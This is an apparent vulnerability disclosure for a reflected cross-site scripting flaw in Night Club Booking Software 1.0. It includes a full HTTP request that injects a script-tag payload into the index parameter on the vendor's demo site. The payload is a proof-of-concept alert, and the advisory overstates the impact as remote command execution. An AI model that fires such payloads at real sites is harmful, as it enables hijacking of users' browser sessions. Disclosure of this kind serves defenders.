Authored by nu11secur1ty

Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.

## Title: Night Club Booking Software-1.0 XSS-Reflected
## Author: nu11secur1ty
## Date: 09/09/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected

## Description:
The value of the index request parameter is copied into the value of an
HTML tag attribute which is encapsulated in double quotation marks. The
payload byymt"><script>alert(1)</script>fs5xr was submitted in the index
parameter. This input was echoed unmodified in the application's response.
The attacker can trick the victim into executing arbitrary commands or
code on his machine remotely.

STATUS: HIGH-CRITICAL Vulnerability

[+]Test Payload:
```GET
/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;
_gat=1; _fbp=fb.1.1694256177815.1029224882
X-Requested-With: XMLHttpRequest
Referer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116",
"Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

```

## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0
)

## Proof and Exploit:
[href](
https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html
)

## Time spent:
00:05:00